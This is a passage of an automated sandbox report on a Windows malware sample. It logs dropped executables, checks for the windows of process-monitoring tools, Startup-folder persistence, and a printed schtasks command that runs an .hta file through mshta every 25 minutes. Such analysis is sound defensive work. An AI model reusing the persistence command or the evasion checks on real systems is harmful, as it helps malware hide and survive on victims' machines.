                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comFile created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.comJump to dropped file
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\789919\Occupation.comJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comFile created: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeJump to dropped file

                                    Boot Survival

                                    barindex
                                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0043F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0043F98E
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004B1C41
                                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
